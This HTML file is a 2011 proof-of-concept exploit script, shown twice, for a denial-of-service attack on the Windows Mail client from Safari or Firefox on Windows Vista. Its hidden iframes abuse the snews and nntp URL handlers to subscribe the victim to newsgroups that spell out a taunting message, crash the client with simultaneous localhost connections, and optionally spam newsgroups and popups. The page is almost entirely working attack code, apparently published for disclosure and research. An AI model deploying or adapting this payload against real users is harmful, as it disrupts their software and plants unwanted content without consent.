bcoles/Windows Mail client DoS from browser PoC.html

## Windows Mail client DoS from browser PoC.html
<script type="text/javascript">

// Windows Mail client DoS from browser PoC (with nntp/snews/news url handlers)
// 2011-09-16 // Brendan Coles <bcoles@gmail.com>

// Should work with Safari/Firefox on Windows Vista
// Some newsgroups are added. You can delete newsgroups here:
// C:\Users\username\AppData\Local\Microsoft\Windows Mail
function doit() {
	//window_spam();
	//newsgroup_spam();
	msg();
	dos();
}

// write a message using newsgroup names // safari and firefox
// note: special characters get URL encoded by the Windows Mail client
function msg() {
	message="I know what you did last summer . this message was brought to you by the wonderful world of url handlers";
	for(var i=0;i<(message.split(' ').length);i++) {
		pad=i+"";
		while (pad.length < 4) pad = '0' + pad;
		document.write("<iframe style='display:none' src='snews://"+pad+"-"+message.split(' ')[i]+"/'></iframe>");
	}
}

// DoS // safari and firefox
// Added newsgroups are removed once Windows Mail closes (unless we crash it)
// Windows mail crashes on simultaneous connections. 10 should be sufficient.
function dos() {
	for(var i=0;i<10;i++) document.write("<iframe style='display:none' src='nntp://127.0.0.1:119//'></iframe>");
}

// newsgroup spam  // safari only
// subscribe to 1000 newsgroups
function newsgroup_spam() {
	for(var i=0;i<10;i++) document.write("<iframe style='display:none' src='snews://"+String.fromCharCode(i)+"//'></iframe>");
}

// popup message spam // safari and firefox
function window_spam() {
	for(var i=0;i<100;i++) document.write("<iframe style='display:none' src='snews://?"+String.fromCharCode(i)+"//'></iframe>");
}

// do it
if (navigator.userAgent.match('(Windows NT 6)') != null && window.navigator.userAgent.match(/(Firefox|Safari)\/\d/) != null && !window.chrome) doit();
else document.write("This page must be viewed in Safari or Firefox on Windows Vista.");

</script>
	<script type="text/javascript">

	// Windows Mail client DoS from browser PoC (with nntp/snews/news url handlers)
	// 2011-09-16 // Brendan Coles <bcoles@gmail.com>

	// Should work with Safari/Firefox on Windows Vista
	// Some newsgroups are added. You can delete newsgroups here:
	// C:\Users\username\AppData\Local\Microsoft\Windows Mail
	function doit() {
	//window_spam();
	//newsgroup_spam();
	msg();
	dos();
	}

	// write a message using newsgroup names // safari and firefox
	// note: special characters get URL encoded by the Windows Mail client
	function msg() {
	message="I know what you did last summer . this message was brought to you by the wonderful world of url handlers";
	for(var i=0;i<(message.split(' ').length);i++) {
	pad=i+"";
	while (pad.length < 4) pad = '0' + pad;
	document.write("<iframe style='display:none' src='snews://"+pad+"-"+message.split(' ')[i]+"/'></iframe>");
	}
	}

	// DoS // safari and firefox
	// Added newsgroups are removed once Windows Mail closes (unless we crash it)
	// Windows mail crashes on simultaneous connections. 10 should be sufficient.
	function dos() {
	for(var i=0;i<10;i++) document.write("<iframe style='display:none' src='nntp://127.0.0.1:119//'></iframe>");
	}

	// newsgroup spam // safari only
	// subscribe to 1000 newsgroups
	function newsgroup_spam() {
	for(var i=0;i<10;i++) document.write("<iframe style='display:none' src='snews://"+String.fromCharCode(i)+"//'></iframe>");
	}

	// popup message spam // safari and firefox
	function window_spam() {
	for(var i=0;i<100;i++) document.write("<iframe style='display:none' src='snews://?"+String.fromCharCode(i)+"//'></iframe>");
	}

	// do it
	if (navigator.userAgent.match('(Windows NT 6)') != null && window.navigator.userAgent.match(/(Firefox\|Safari)\/\d/) != null && !window.chrome) doit();
	else document.write("This page must be viewed in Safari or Firefox on Windows Vista.");

	</script>